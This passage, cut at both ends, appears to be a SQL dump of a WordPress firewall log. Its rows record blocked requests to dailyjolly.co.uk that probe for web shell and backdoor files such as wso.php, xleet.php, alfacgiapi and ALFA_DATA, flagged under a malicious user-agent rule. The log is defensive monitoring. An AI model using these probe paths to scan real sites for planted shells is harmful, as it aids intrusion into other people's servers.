User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10937,1673863599.464069,1673863599.347300,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10938,1673863599.307753,1673863599.195700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10939,1673863599.155858,1673863599.046500,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10940,1673863599.000698,1673863598.891500,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10941,1673863598.796655,1673863598.664100,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10942,1673863598.227959,1673863598.097700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10943,1673863597.993272,1673863597.882400,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10944,1673863597.842517,1673863597.728900,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10945,1673863597.689000,1673863597.572600,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10946,1673863597.465503,1673863597.346900,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10947,1673863597.307005,1673863597.190300,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10948,1673863597.146632,1673863597.033700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10949,1673863596.917943,1673863596.779300,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10950,1673863596.619604,1673863596.486900,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10951,1673863587.960914,1673863587.849200,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(10952,1673863585.881891,1673863585.750700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(10953,1673866145.174727,1673866145.044700,'\0\0\0\0\0\0\0\0\0\0���h!�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10954,1673866140.477693,1673866140.352100,'\0\0\0\0\0\0\0\0\0\0���h!�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10955,1673866130.929238,1673866130.798900,'\0\0\0\0\0\0\0\0\0\0���h!�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10956,1673866124.748987,1673866124.620600,'\0\0\0\0\0\0\0\0\0\0���h!�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10957,1673883890.361958,1673883890.210700,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(10958,1673883866.382729,1673883866.246900,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(10959,1673883865.410531,1673883865.299100,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(10960,1673883864.487852,1673883864.375300,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(10961,1673883863.233930,1673883863.080600,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(10962,1673883862.194839,1673883862.086800,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10963,1673883861.163503,1673883861.026200,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10964,1673883860.150607,1673883860.042200,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10965,1673883858.081441,1673883857.971200,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10966,1673883814.795768,1673883814.663400,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10967,1673883755.897422,1673883755.789100,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10968,1673883753.650415,1673883753.525400,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10969,1673883748.924254,1673883748.813900,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10970,1673883747.576362,1673883747.461200,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10971,1673883746.850589,1673883746.712200,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10972,1673883714.137303,1673883714.025800,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10973,1673883712.181139,1673883711.998500,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10974,1673883709.740578,1673883709.604600,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10975,1673883659.760629,1673883659.629700,'\0\0\0\0\0\0\0\0\0\0��[�R$',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10976,1673883644.813997,1673883644.689600,'\0\0\0\0\0\0\0\0\0\0��[�R$',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10977,1673883643.385440,1673883643.270100,'\0\0\0\0\0\0\0\0\0\0��[�R$',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10978,1673883642.397033,1673883642.269200,'\0\0\0\0\0\0\0\0\0\0��[�R$',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10979,1673883615.691664,1673883615.534100,'\0\0\0\0\0\0\0\0\0\0��[�R$',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10980,1673883592.760373,1673883592.618900,'\0\0\0\0\0\0\0\0\0\0��[�R$',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10981,1673883524.795315,1673883524.633300,'\0\0\0\0\0\0\0\0\0\0��[�R$',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10982,1673883487.342797,1673883487.213400,'\0\0\0\0\0\0\0\0\0\0��[�R$',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10983,1673883413.917296,1673883413.784000,'\0\0\0\0\0\0\0\0\0\0��[�R$',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10984,1673883374.805681,1673883374.674900,'\0\0\0\0\0\0\0\0\0\0��[�R$',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10985,1673883350.819653,1673883350.686700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10986,1673883336.563105,1673883336.373500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10987,1673883266.648302,1673883266.498400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 